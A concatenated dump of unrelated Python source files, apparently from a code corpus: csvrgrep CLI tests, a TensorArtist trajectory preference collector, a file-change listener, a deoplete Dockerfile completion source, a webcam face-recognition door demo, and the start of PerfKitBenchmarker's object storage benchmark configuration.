"1",
"examples/test_skip_lines.csv",
],
[
["a", "b", "c"],
["1", "2", "3"],
],
)
def test_basic(self):
"""
a,b,c
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertRows(
[r"\d{2}", "examples/dummy5.csv"],
[["a", "b", "c"], ["2", "3", "42"], ["22", "99", "222"]],
)
def test_basic_column_arg(self):
"""
a,b,c
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertRows(
[
r"3|22",
"examples/dummy5.csv",
"-c",
"b,c",
],
[["a", "b", "c"], ["1", "2", "3"], ["2", "3", "42"], ["22", "99", "222"]],
)
def test_two_patterns(self):
"""
a,b,c
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertRows(
[
"-c",
"b,c",
"3|22",
"-E",
r"^\d$",
"examples/dummy5.csv",
],
[["a", "b", "c"], ["1", "2", "3"], ["2", "3", "42"]],
)
def test_multi_patterns_explicit_col_arg(self):
"""
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertLines(
[
"-c",
"b,c",
"3|22",
"-E",
r"^\d$",
"c",
"examples/dummy5.csv",
],
["a,b,c", "1,2,3"],
)
######################################################################
# test match modes
######################################################################
def test_basic_literal_match(self):
self.assertRows(
["-m", r"\d{2}", "examples/dummy5.csv"],
[
["a", "b", "c"],
],
)
self.assertRows(
["-m", "-c", "c", "22", "examples/dummy5.csv"],
[["a", "b", "c"], ["22", "99", "222"]],
)
def test_all_match(self):
"""TODO: can't mix and match positional and optional args?"""
self.assertLines(
["-a", "-c", "a,c", r"\d{2,}", "examples/dummy5.csv"],
[
"a,b,c",
"22,99,222",
],
)
######################################################################
# multi expressions
######################################################################
def test_multi_expression_basic(self):
self.assertLines(
["2", "-E", r"1|3", "examples/dummy5.csv"],
[
"a,b,c",
"1,2,3",
"2,3,42",
],
)
def test_multi_expression_variable_expr_args(self):
self.assertLines(
["2", "-m", "-E", r"3", "b,c", "-E", "2", "examples/dummy5.csv"],
[
"a,b,c",
"1,2,3",
"2,3,42",
],
)
def test_expr_col_arg_overrides_main_columns_flag(self):
"""
if the expression has a column str other than '', then its list of column_ids to grep
takes precedence over -c/--columns
"""
self.assertLines(
["-c", "a,c", "2", "-E", r"\d{2,}", "b", "examples/dummy5.csv"],
[
"a,b,c",
"22,99,222",
],
)
def test_expr_col_arg_defaults_to_main_columns_flag(self):
"""
if the expression has a blank column str, then it uses whatever -c/--columns is set to
(and if -c is unset, then all columns are grepped)
1,2,3
2,3,42
3,4,1
22,99,222
"""
self.assertLines(
[
"-c",
"c,a",
"2",
"-E",
r"\d{2,}",
"a,b,c",
"-E",
"4",
"examples/dummy5.csv",
],
[
"a,b,c",
"2,3,42",
],
)
self.assertLines(
["-c", "a,b", "2", "-E", "3", "examples/dummy5.csv"],
[
"a,b,c",
"2,3,42",
],
)
def test_multi_expressions_are_ANDed_not_ORed(self):
self.assertLines(
[
".+",
"examples/hamlet.csv",
"--expr",
r"^[HL]",
"speaker",
"--expr",
r"[^1]",
"act",
"--expr",
r"\w{6,}",
],
[
"act,scene,speaker,lines",
"4,7,Laertes,Know you the hand?",
],
)
######################################
# discerning input_file/stdin argument
######################################
def test_when_single_pattern_and_no_input_file(self):
r"""
cat data.txt | csvrgrep '4'
"""
# p1 = Popen(["cat", "examples/dummy5.csv"], stdout=PIPE)
# p2 = Popen(
# [
# CLI_PATH,
# "4",
# ],
# stdin=p1.stdout,
# stdout=PIPE,
# )
# p1.stdout.close()
# p1.wait()
# txt = p2.communicate()[0].decode("utf-8")
# p2.wait()
# lines = txt.splitlines()
self.assertCmdLines(
"cat examples/dummy5.csv | csvrgrep '4'",
[
"a,b,c",
"2,3,42",
"3,4,1",
],
)
def test_when_last_expr_has_just_one_arg_and_no_input_file(self):
r"""
cat data.txt | csvrgrep '1' -E '4'
"""
# p1 = Popen(["cat", "examples/dummy5.csv"], stdout=PIPE)
# p2 = Popen([CLI_PATH, "1", "-E", "4"], stdin=p1.stdout, stdout=PIPE)
# p1.stdout.close()
# p1.wait()
# txt = p2.communicate()[0].decode("utf-8")
# p2.wait()
# lines = txt.splitlines()
self.assertCmdLines(
"""cat examples/dummy5.csv | csvrgrep '1' -E '4'""",
[
"a,b,c",
"3,4,1",
],
)
######################################
# special names test
######################################
@skiptest("csvrgrep is not a registered entry point")
def test_names_mode_with_stdin(self):
# p1 = Popen(["cat", "examples/dummy.csv"], stdout=PIPE)
# p2 = Popen([CLI_PATH, "-n"], stdin=p1.stdout, stdout=PIPE)
# p1.stdout.close()
# p1.wait()
# txt = p2.communicate()[0].decode("utf-8")
# p2.wait()
# lines = [t.strip() for t in txt.splitlines()]
self.assertCmdLines(
"""cat examples/dummy.csv | csvrgrep -n""",
[
"1: a",
"2: b",
"3: c",
],
)
######################################
# errors
######################################
def test_error_when_no_pattern_and_no_input_file(self):
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output([])
self.assertEqual(e.exception.code, 2)
self.assertIn("Must provide a [PATTERN] argument", ioerr.getvalue())
def test_error_when_no_pattern_but_additional_expressions(self):
""""todo, maybe redundant"""
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output(["-E", "1", "examples/dummy.csv"])
self.assertEqual(e.exception.code, 2)
self.assertIn("Must provide a [PATTERN] argument", ioerr.getvalue())
def test_error_when_expression_has_0_args(self):
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output(["-E", "-m", "PATTERN", "examples/dummy.csv"])
self.assertEqual(e.exception.code, 2)
self.assertIn("-E/--expr takes 1 or 2 arguments, not 0:", ioerr.getvalue())
def test_error_when_expression_has_more_than_2_args(self):
ioerr = StringIO()
with contextlib.redirect_stderr(ioerr):
with self.assertRaises(SystemExit) as e:
u = self.get_output(
[
"PATTERN",
"examples/dummy.csv",
"-E",
"a",
"b",
"c",
]
)
self.assertEqual(e.exception.code, 2)
self.assertIn("-E/--expr takes 1 or 2 arguments, not 3:", ioerr.getvalue())
def test_no_error_when_expression_has_1_args_and_piped_input(self):
p1 = Popen(
[
"cat",
"examples/dummy.csv",
],
stdout=PIPE,
)
p2 = Popen(
[
CLI_PATH,
"2|1",
"-E",
"1|2",
],
stdin=p1.stdout,
stdout=PIPE,
)
p1.stdout.close()
p1.wait()
txt = p2.communicate()[0].decode("utf-8")
p2.wait()
self.assertEqual(txt.splitlines(), ["a,b,c", "1,2,3"])
@skiptest("because I dont know how to deal with stdin.isatty holdup")
def test_error_when_final_expression_eats_up_input_path(self):
ioerr = StringIO()
old_stdin = sys.stdin
with contextlib.redirect_stderr(ioerr):
# with self.assertRaises(SystemExit) as e:
args = ["-E", "1", "-E", "2", "-E", "examples/dummy.csv"]
# p = Process(target=self.get_output, args=(args,))
# p.start()
sys.stdin = StringIO("a,b,c\n1,2,3\n")
# p.join()
self.assertIn("WARNING", ioerr.getvalue())
# self.assertEqual(e.exception.code, 2)
# clean up stdin
sys.stdin = oldstdin
exit
|
pcollector.py
|
# -*- coding:utf8 -*-
# File : pcollector.py
# Author : Jiayuan Mao
# Email : maojiayuan@gmail.com
# Date : 01/07/2017 #
# This file is part of TensorArtist.
import os
import collections
import itertools
import os.path as osp
import threading
import uuid
import imageio
import numpy as np
import sortedcollections
from tornado import ioloop, template
from tornado.web import Application, StaticFileHandler
from tartist.core import get_env, get_logger
from tartist.core import io
from tartist.core.utils.network import get_local_addr
from .rpredictor import TrainingData
TrajectoryPair = collections.namedtuple('TrajectoryPair', ['t1_state', 't1_observation', 't1_action',
't2_state', 't2_observation', 't2_action'])
_TrajectoryPairWrapper = collections.namedtuple('_TrajectoryPairWrapper', ['priority', 'count', 'pair'])
logger = get_logger(__file__)
def _compose_dir(uuid):
dirname = osp.join(get_env('dir.root'), 'trajectories', uuid)
return dirname
def _save_gif(traj, filename):
traj = np.asarray(traj, dtype='uint8')
return imageio.mimwrite(filename, traj, duration=0.1)
class PreferenceCollector(object):
"""Preference collector is the interface for prefcol's front end."""
def __init__(self, rpredictor, web_configs, video_length=100, window_length=300, pool_size=100):
"""
Initialize the preference collector.
:param rpredictor: the corresponding reward predictor.
:param web_configs: web server configs.
:param video_length: video length.
:param window_length: window length, for video sampling. The video for labeling will be sampled by choosing
the subsequent `video_length` frames with largest summed variance within every `window_length` frames.
:param pool_size: cache pool size for labeling.
"""
self._rpredictor = rpredictor
self._pool = TrajectoryPairPool(maxlen=pool_size)
self._webserver = WebServer(self, configs=web_configs)
self._webserver_thread = None
self._video_length = video_length
self._window_length = window_length
assert self._video_length <= self._window_length
# `data` holds the working set of each worker (wid => list of observations)
self._data_buffer = collections.defaultdict(lambda: collections.deque(maxlen=window_length))
# pair buffer is a buffer with size at most 2, used for generating the pair
self._pair_buffer = []
self._pair_mutex = threading.Lock()
@property
def pool(self):
return self._pool
@property
def rpredictor(self):
return self._rpredictor
def initialize(self):
# First: try to restore the stored preference.
self.__restore_preferences()
# Start the webserver thread.
self._webserver_thread = threading.Thread(target=self._webserver.mainloop, daemon=True)
self._webserver_thread.start()
def post_state(self, identifier, state, observation, action, variance):
# Do NOT use lock: each worker (identified by `identifier`) is one thread.
data = self._data_buffer[identifier]
data.append((state, observation, action, variance))
if len(data) == data.maxlen:
self._try_post_video(data)
def post_preference(self, uid, pref):
dirname = _compose_dir(uid)
pair = io.load(osp.join(dirname, 'pair.pkl'))
io.dump(osp.join(dirname, 'pref.txt'), str(pref))
logger.info('Post preference uid={}, pref={}.'.format(uid, pref))
data = TrainingData(pair.t1_state, pair.t1_action, pair.t2_state, pair.t2_action, pref)
# Lock acquired inside this function call.
self._rpredictor.add_training_data(data)
def _try_post_video(self, data):
# Find the subsequence with largest variance.
current_sum = 0
for i in range(self._video_length):
current_sum += data[i][-1]
max_sum, max_idx = current_sum, 0
for i in range(self._video_length, self._window_length):
current_sum = current_sum - data[i-self._video_length][-1] + data[i][-1]
if current_sum > max_sum:
max_sum, max_idx = current_sum, i - self._video_length
# Extract the subsequence.
this_states, this_observations, this_actions = [], [], []
for i in range(max_idx):
data.popleft()
for i in range(self._video_length):
d = data.popleft()
this_states.append(d[0])
this_observations.append(d[1])
this_actions.append(d[2])
# Convert the output to ndarrays.
this_states, this_observations, this_actions = map(np.array, (this_states, this_observations, this_actions))
self._try_post_pair(this_states, this_observations, this_actions, max_sum)
def _try_post_pair(self, states, observations, actions, variance):
# Non-thread-safe operation: acquire the lock.
with self._pair_mutex:
self._pair_buffer.append((states, observations, actions, variance))
if len(self._pair_buffer) == 2:
t1, t2 = self._pair_buffer
self._pool.push(t1[0], t1[1], t1[2], t2[0], t2[1], t2[2], t1[3] + t2[3])
self._pair_buffer.clear()
def __restore_preferences(self):
"""Restore the preferences we already have."""
dirname = osp.join(get_env('dir.root'), 'trajectories')
if not osp.isdir(dirname):
return
all_data = []
logger.critical('Restoring preference')
for uid in os.listdir(dirname):
item = osp.join(dirname, uid)
pref_filename = osp.join(item, 'pref.txt')
pair_filename = osp.join(item, 'pair.pkl')
if osp.exists(pref_filename) and osp.exists(pair_filename):
pref = float(io.load(pref_filename)[0])
pair = io.load(pair_filename)
data = TrainingData(pair.t1_state, pair.t1_action, pair.t2_state, pair.t2_action, pref)
all_data.append(data)
if len(all_data) > 0:
self._rpredictor.extend_training_data(all_data)
logger.critical('Preference restore finished: success={}'.format(len(all_data)))
class TrajectoryPairPool(object):
"""
Trajectory pool is a simple pool contains a set of trajectories. In this implementation, we maintain a priority
queue of given max size. When new trajectory comes in, we push it into the priority queue and pop out the one
with least priority.
When pool.pop() method is called, the trajectory pair with highest priority is poped out. The program generates the
demonstration file (e.g. GIF animation) and return an UID and the pair.
See _dump method for details of dump.
"""
def __init__(self, maxlen=100, tformat='GIF'):
"""
Initialize an empty trajectory pair pool.
:param maxlen: max size of the pool.
:param tformat: trajectory format, default "GIF".
"""
self._data_pool = sortedcollections.SortedList()
self._data_pool_counter = itertools.count()
self._data_pool_lock = threading.Lock()
self._maxlen = maxlen
self._tformat = tformat
def push(self, t1_state, t1_observation, t1_action, t2_state, t2_observation, t2_action, priority):
with self._data_pool_lock:
wrapped = _TrajectoryPairWrapper(priority=priority, count=next(self._data_pool_counter),
pair=TrajectoryPair(
t1_state, t1_observation, t1_action,
t2_state, t2_observation, t2_action))
self._data_pool.add(wrapped)
if len(self._data_pool) == self._maxlen:
self._data_pool.pop(0)
def pop(self):
with self._data_pool_lock:
if len(self._data_pool) == 0:
return None, None
return self._process(self._data_pool.pop().pair)
def _process(self, pair):
uid = uuid.uuid4().hex
dirname = _compose_dir(uid)
io.mkdir(dirname)
# dump the file for displaying
if self._tformat == 'GIF':
_save_gif(pair.t1_observation, osp.join(dirname, '1.gif'))
_save_gif(pair.t2_observation, osp.join(dirname, '2.gif'))
else:
raise ValueError('Unknown trajectory format: {}'.format(self._tformat))
# cleanup
pair = TrajectoryPair(pair.t1_state, None, pair.t1_action, pair.t2_state, None, pair.t2_action)
# dump the raw pair
io.dump(osp.join(dirname, 'pair.pkl'), pair)
return uid, pair
class WebServer(object):
def __init__(self, collector, configs):
from .pcollector_web_handlers import MainHandler, GetHandler, SubmitHandler
self._template_loader = template.Loader(osp.join(osp.dirname(__file__), '_tpl'))
self._configs = configs
init_kwargs = dict(collector=collector, loader=self._template_loader, configs=configs)
self._application = Application([
(r'/', MainHandler, init_kwargs),
(r'/get', GetHandler, init_kwargs),
(r'/submit', SubmitHandler, init_kwargs),
(r'/trajectories/(.*)', StaticFileHandler, {'path': osp.join(get_env('dir.root'), 'trajectories')})
], debug=True)
@property
def application(self):
return self._application
@property
def port(self):
return self._configs['port']
def mainloop(self):
logger.critical('Opening web server at: http://{}:{} .'.format(get_local_addr(), self.port))
self._application.listen(self.port)
ioloop.IOLoop.current().start()
|
file_listener.py
|
# ===============================================================================
# Copyright 2012 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
# ============= standard library imports ========================
from __future__ import absolute_import
import os
import time
from threading import Thread
# ============= local library imports ==========================
class FileListener(object):
_path = None
_callback = None
_check_callback = None
_alive = False
_freq = None
def __init__(self, path, callback=None, check=None, freq=1):
"""
two methods for check if the file has changed
1. check=None
a file has changed if its modified time is different from the original modified time
2. check=callable
use a callable to compare files
e.g experiment_set uses check_for_mods which compares the sha digests of the file contents
freq= in hertz... sleep period =1/freq
remember to call stop() to stop checking the file for changes
"""
self._path = path
self._callback = callback
self._check_callback = check
self._freq = freq
self._alive = True
if os.path.isfile(self._path):
t = Thread(target=self._listen)
t.start()
@property
def otime(self):
return os.stat(self._path).st_mtime
def stop(self):
self._alive = False
def _listen(self):
self._otime = self.otime
while self._alive:
time.sleep(1 / self._freq)
if self._check():
self._callback()
self._otime = self.otime
def _check(self):
if self._check_callback:
return self._check_callback()
else:
return self.otime != self._otime
# ============= EOF =============================================
|
docker.py
|
# Copyright 2016 Koichi Shiraishi. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import re
import threading
from .base import Base
from deoplete.util import load_external_module
load_external_module(__file__, 'urllib3')
load_external_module(__file__, 'dockerhub')
from dockerhub.dockerhub import DockerHub
KEYWORD = [
'ADD', 'ARG', 'CMD', 'COPY', 'ENTRYPOINT', 'ENV', 'EXPOSE', 'FROM',
'HEALTHCHECK', 'LABEL', 'MAINTAINER', 'RUN', 'SHELL', 'STOPSIGNAL', 'USER',
'VOLUME', 'WORKDIR'
]
class Source(Base):
def __init__(self, vim):
Base.__init__(self, vim)
self.name = 'docker'
self.mark = '[Docker]'
self.filetypes = ['dockerfile']
self.input_pattern = r'[a-zA-Z_]\w*[:/]\w*|' + \
r'^\s*[' + '|'.join(KEYWORD) + ']\s+(?:[\w\.]*(?:,\s*)?)*'
self.rank = 500
self.debug_enabled = 1
self.hub = DockerHub()
self.cache_images = dict()
self.cache_tags = dict()
self.keyword_result = [{'word': x} for x in KEYWORD]
def init(self, context):
try:
images = self.hub.search('library')
except Exception:
pass
else:
self.cache_images['library'] = []
for i in images:
self.cache_images['library'].append({
'word': i['name'],
'kind': i['description'],
'dup': 1,
})
def on_init(self, context):
th = threading.Thread(target=self.init, name='init', args=(context, ))
th.start()
def get_complete_position(self, context):
m = re.search(r'\w*$', context['input'])
return m.start() if m else -1
def gather_candidates(self, context):
input_text = context['input']
if 'FROM' in input_text:
return self.result_from(context['input'])
elif 'ONBUILD' in input_text:
return self.keyword_result
else:
return self.keyword_result + [{'word': 'ONBUILD'}]
def result_from(self, input_text):
t = input_text.strip('FROM ')
if t:
if t.find(':') != -1:
name = t.split(':')[0]
if self.cache_tags.get(name):
return self.cache_tags[name]
else:
tags = self.hub.tags(name)
out = []
for i in tags:
out.append({
'word': i['name'],
'dup': 1,
})
self.cache_tags[name] = out
return out
elif t.find('/') != -1:
user = t.split('/')[0]
if self.cache_images.get(user):
return self.cache_images[user]
else:
images = self.hub.search(user)
out = []
for i in images:
out.append({
'word': i['name'],
'kind': i['description'],
'dup': 1,
})
self.cache_images[user] = out
return self.cache_images[user]
else:
return self.cache_images['library']
|
timed_face_recognition.py
|
import cv2
import numpy as np
import time, threading
import pandas as pd
def face_recognition(names):
door_closed = cv2.imread("door_1.png")
door_open = cv2.imread("door_14.png")
resized_door_closed = cv2.resize(door_closed,None,fx=0.5,fy=0.5)
resized_door_open = cv2.resize(door_open,None,fx=0.5,fy=0.5)
print("You have 15 seconds time to scan your face")
def timer():
time_limit = 17 # 30 seconds time to scan your face and get inside
while time_limit >= 0:
m, s = divmod(time_limit, 60)
h, m = divmod(m, 60)
time.sleep(1)
time_limit -= 1
if stop_thread:
break
if time_limit == -1:
print("Sorry scanning time limit reached")
else:
print("Scanning Interrupted")
video_capture.release()
cv2.destroyAllWindows()
stop_thread = False
timer_thread = threading.Thread(target=timer)
timer_thread.start()
recognizer = cv2.face.LBPHFaceRecognizer_create()
recognizer.read('Trainer/trainer.yml')
cascPathface = "haarcascade_frontalface_alt2.xml"
faceCascade = cv2.CascadeClassifier(cascPathface)
font = cv2.FONT_HERSHEY_SIMPLEX
id = 0
video_capture = cv2.VideoCapture(0, cv2.CAP_DSHOW) # TURNING VIDEO ON
blank = np.zeros((500, 1000, 3), dtype=np.uint8) # CREATING A BLANK IMAGE TO DISPLAY THE ERROR MESSAGE
video_capture.set(3, 640) # set video widht
video_capture.set(4, 480) # set video height
# Define min window size to be recognized as a face
minW = 0.1 * video_capture.get(3)
minH = 0.1 * video_capture.get(4)
while video_capture.isOpened():
cv2.imshow("Door",resized_door_closed)
ret, frame = video_capture.read()
# IF CONDITION TO CHECK PROPER WORKING
if not ret:
print("Unable to open video")
break
frame = cv2.flip(frame, 1) # FLIPPING IT VERTICALLY
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY) # CONVERTING INTO GRAY SCALE
faces = faceCascade.detectMultiScale(gray, scaleFactor=1.2, minNeighbors=5, minSize=(int(minW), int(minH)),
flags=cv2.CASCADE_SCALE_IMAGE)
# IF MORE THAN 1 FACE IS DETECTED THEN STOP
if len(faces) > 1:
cv2.destroyWindow('Video')
cv2.putText(blank, "'Sorry' Stopped due to more faces", (0, 50), None, 1, (255, 255, 255), 2)
cv2.imshow('Error! Closed', blank)
if cv2.waitKey(0) & 0xFF == ord('q'):
break
for (x, y, w, h) in faces:
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2) # CREATING RECTANGLE AROUND FACE
id, confidence = recognizer.predict(gray[y:y + h, x:x + w]) # PREDICTING USING TRAINED MODEL
# If confidence is less them 100 ==> "0" : perfect match
if (confidence < 100):
id = names[id]
confidence = " {0}%".format(round(100 - confidence))
cv2.putText(frame, "Face Matched with the person", (50, 50), font, 1, (255, 255, 255), 2)
cv2.imshow("Door",resized_door_open)
# print("Face Matched with",id,",Door Opened")
else:
id = "Unknown"
confidence = " {0}%".format(round(100 - confidence))
cv2.putText(frame, "For Emergency SOS, Press 's'", (50, 50), font, 1, (255, 255, 255), 2)
# ADD SOS FUNCTION
cv2.putText(frame, str(id), (x + 5, y - 5), font, 1, (255, 255, 255), 2) # Displaying text "NAME"
cv2.putText(frame, str(confidence), (x + 5, y + h - 5), font, 1, (255, 255, 0),
1) # Displaying text "CONFIDENCE"
cv2.imshow('Video', frame)
if cv2.waitKey(1) & 0xFF == ord('q'):
break
video_capture.release()
cv2.destroyAllWindows()
stop_thread = True
timer_thread.join()
if __name__ == '__main__':
df1 = pd.read_excel("Data_of_Employees.xlsx", engine='openpyxl')
names = ['None'] + df1['Name'].tolist()
face_recognition(names)
|
object_storage_service_benchmark.py
|
# Copyright 2016 PerfKitBenchmarker Authors. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Object (blob) Storage benchmark tests.
There are two categories of tests here: 1) tests based on CLI tools, and 2)
tests that use APIs to access storage provider.
For 1), we aim to simulate one typical use case of common user using storage
provider: upload and downloads a set of files with different sizes from/to a
local directory.
For 2), we aim to measure more directly the performance of a storage provider
by accessing them via APIs. Here are the main scenarios covered in this
category:
a: Single byte object upload and download, measures latency.
b: List-after-write and list-after-update consistency measurement.
c: Single stream large object upload and download, measures throughput.
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import datetime
import glob
import json
import logging
import os
import posixpath
import re
import threading
import time
import uuid
import numpy as np
from perfkitbenchmarker import configs
from perfkitbenchmarker import data
from perfkitbenchmarker import errors
from perfkitbenchmarker import flag_util
from perfkitbenchmarker import flags
from perfkitbenchmarker import object_storage_service
from perfkitbenchmarker import providers
from perfkitbenchmarker import sample
from perfkitbenchmarker import units
from perfkitbenchmarker import vm_util
from perfkitbenchmarker.providers.gcp import gcs
from perfkitbenchmarker.sample import PercentileCalculator # noqa
import six
from six.moves import range
from six.moves import zip
flags.DEFINE_enum('storage', providers.GCP,
[providers.GCP, providers.AWS,
providers.AZURE, providers.OPENSTACK],
'storage provider (GCP/AZURE/AWS/OPENSTACK) to use.')
flags.DEFINE_string('object_storage_region', None,
'Storage region for object storage benchmark.')
flags.DEFINE_string('object_storage_gcs_multiregion', None,
'Storage multiregion for GCS in object storage benchmark.')
flags.DEFINE_string('object_storage_storage_class', None,
'Storage class to use in object storage benchmark.')
flags.DEFINE_enum('object_storage_scenario', 'all',
['all', 'cli', 'api_data', 'api_namespace',
'api_multistream', 'api_multistream_writes',
'api_multistream_reads'],
'select all, or one particular scenario to run: \n'
'ALL: runs all scenarios. This is the default. \n'
'cli: runs the command line only scenario. \n'
'api_data: runs API based benchmarking for data paths. \n'
'api_namespace: runs API based benchmarking for namespace '
'operations. \n'
'api_multistream: runs API-based benchmarking with multiple '
'upload/download streams.\n'
'api_multistream_writes: runs API-based benchmarking with '
'multiple upload streams.')
flags.DEFINE_string('object_storage_bucket_name', None,
'If set, the bucket will be created with this name')
flags.DEFINE_boolean('object_storage_apply_region_suffix_to_bucket_name', False,
'If set, the region will be appended to the bucket name.')
flags.DEFINE_enum('cli_test_size', 'normal',
['normal', 'large'],
'size of the cli tests. Normal means a mixture of various \n'
'object sizes up to 32MiB (see '
'data/cloud-storage-workload.sh). \n'
'Large means all objects are of at least 1GiB.')
flags.DEFINE_integer('object_storage_multistream_objects_per_stream', 1000,
'Number of objects to send and/or receive per stream. '
'Only applies to the api_multistream scenario.',
lower_bound=1)
flag_util.DEFINE_yaml('object_storage_object_sizes', '1KB',
'Size of objects to send and/or receive. Only applies to '
'the api_multistream scenario. Examples: 1KB, '
'{1KB: 50%, 10KB: 50%}')
flags.DEFINE_integer('object_storage_streams_per_vm', 10,
'Number of independent streams per VM. Only applies to '
'the api_multistream scenario.',
lower_bound=1)
flags.DEFINE_integer('object_storage_list_consistency_iterations', 200,
'Number of iterations to perform for the api_namespace '
'list consistency benchmark. This flag is mainly for '
'regression testing in the benchmarks. Reduce the number '
'to shorten the execution time of the api_namespace '
'scenario. However, to get useful metrics from the '
'api_namespace scenario, a high number of iterations '
'should be used (>=200).')
flags.DEFINE_enum('object_storage_object_naming_scheme', 'sequential_by_stream',
['sequential_by_stream',
'approximately_sequential'],
'How objects will be named. Only applies to the '
'api_multistream benchmark. '
'sequential_by_stream: object names from each stream '
'will be sequential, but different streams will have '
'different name prefixes. '
'approximately_sequential: object names from all '
'streams will roughly increase together.')
flags.DEFINE_string('object_storage_objects_written_file_prefix', None,
'If specified, the bucket and all of the objects will not '
'be deleted, and the list of object names will be written '
'to a file with the specified prefix in the following '
'format: <bucket>/<object>. This prefix can be passed to '
'this benchmark in a later run via via the '
'object_storage_read_objects_prefix flag. Only valid for '
'the api_multistream and api_multistream_writes scenarios. '
'The filename is appended with the date and time so that '
'later runs can be given a prefix and a minimum age of '
'objects. The later run will then use the oldest objects '
'available or fail if there is no file with an old enough '
'date. The prefix is also appended with the region so that '
'later runs will read objects from the same region.')
flags.DEFINE_string('object_storage_read_objects_prefix', None,
'If specified, no new bucket or objects will be created. '
'Instead, the benchmark will read the objects listed in '
'a file with the specified prefix that was written some '
'number of hours before (as specifed by '
'object_storage_read_objects_min_hours). Only valid for '
'the api_multistream_reads scenario.')
flags.DEFINE_integer('object_storage_read_objects_min_hours', 72, 'The minimum '
'number of hours from which to read objects that were '
'written on a previous run. Used in combination with '
'object_storage_read_objects_prefix.')
flags.DEFINE_boolean('object_storage_dont_delete_bucket', False,
'If True, the storage bucket won\'t be deleted. Useful '
'for running the api_multistream_reads scenario multiple '
'times against the same objects.')
flags.DEFINE_string('object_storage_worker_output', None,
'If set, the worker threads\' output will be written to the'
'path provided.')
flags.DEFINE_float('object_storage_latency_histogram_interval', None,
'If set, a latency histogram sample will be created with '
'buckets of the specified interval in seconds. Individual '
'histogram samples are created for each different object '
'size in the distribution, because it is easy to aggregate '
'the histograms during post-processing, but impossible to '
'go in the opposite direction.')
flags.DEFINE_boolean(
'record_individual_latency_samples', False,
'If set, record the latency of each download and upload '
'in its own sample.')
FLAGS = flags.FLAGS
BENCHMARK_INFO = {'name': 'object_storage_service',
'description':
'Object/blob storage service benchmarks. Specify '
'--object_storage_scenario '
'to select a set of sub-benchmarks to run. default is all.',
'scratch_disk': False,
'num_machines': 1}
BENCHMARK_NAME = 'object_storage_service'
BENCHMARK_CONFIG = """
object_storage_service:
description: >
Object/blob storage service benchmarks. Specify
--object_storage_scenario
to select a set of sub-benchmarks to run. default is all.
vm_groups:
default:
vm_spec: *default_single_core
vm_count: null
flags:
gcloud_scopes: https://www.googleapis.com/auth/devstorage.read_write
"""
DATA_FILE = 'cloud-storage-workload.sh'
# size of all data used in the CLI tests.
DATA_SIZE_IN_BYTES = 256.1 * 1024 * 1024
DATA_SIZE_IN_MBITS = 8 * DATA_SIZE_IN_BYTES / 1000 / 1000
LARGE_DATA_SIZE_IN_BYTES = 3 * 1024 * 1024 * 1024
LARGE_DATA_SIZE_IN_MBITS = 8 * LARGE_DATA_SIZE_IN_BYTES / 1000 / 1000
API_TEST_SCRIPT = 'object_storage_api_tests.py'
API_TEST_SCRIPTS_DIR = 'object_storage_api_test_scripts'
# Files that will be sent to the remote VM as a package for API test script.
API_TEST_SCRIPT_PACKAGE_FILES = [
'__init__.py', 'object_storage_interface.py', 'azure_flags.py',
'gcs_flags.py', 's3_flags.py'
]
SCRIPT_DIR = '/tmp/run'
DOWNLOAD_DIRECTORY = posixpath.join(SCRIPT_DIR, 'temp')
# Various constants to name the result metrics.
THROUGHPUT_UNIT = 'Mbps'
LATENCY_UNIT = 'seconds'
NA_UNIT = 'na'
PERCENTILES_LIST = ['p0.1', 'p1', 'p5', 'p10', 'p50', 'p90', 'p95', 'p99',
'p99.9', 'average', 'stddev']
UPLOAD_THROUGHPUT_VIA_CLI = 'upload throughput via cli Mbps'
DOWNLOAD_THROUGHPUT_VIA_CLI = 'download throughput via cli Mbps'
CLI_TEST_ITERATION_COUNT = 100
LARGE_CLI_TEST_ITERATION_COUNT = 20
CLI_TEST_FAILURE_TOLERANCE = 0.05
# Azure does not parallelize operations in its CLI tools. We have to
# do the uploads or downloads of 100 test files sequentially, it takes
# a very long time for each iteration, so we are doing only 3 iterations.
CLI_TEST_ITERATION_COUNT_AZURE = 3
SINGLE_STREAM_THROUGHPUT = 'single stream %s throughput Mbps'
ONE_BYTE_LATENCY = 'one byte %s latency'
LIST_CONSISTENCY_SCENARIOS = ['list-after-write', 'list-after-update']
LIST_CONSISTENCY_PERCENTAGE = 'consistency percentage'
LIST_INCONSISTENCY_WINDOW = 'inconsistency window'
LIST_LATENCY = 'latency'
CONTENT_REMOVAL_RETRY_LIMIT = 5
# Some times even when a bucket is completely empty, the service provider would
# refuse to remove the bucket with "BucketNotEmpty" error until up to 1 hour
# later. We keep trying until we reach the one-hour limit. And this wait is
# necessary for some providers.
BUCKET_REMOVAL_RETRY_LIMIT = 120
RETRY_WAIT_INTERVAL_SECONDS = 30
# GCS has special region handling until we can remove it :(
DEFAULT_GCS_MULTIREGION = 'us'
# Keys for flag names and metadata values
OBJECT_STORAGE_REGION = 'object_storage_region'
REGIONAL_BUCKET_LOCATION = 'regional_bucket_location'
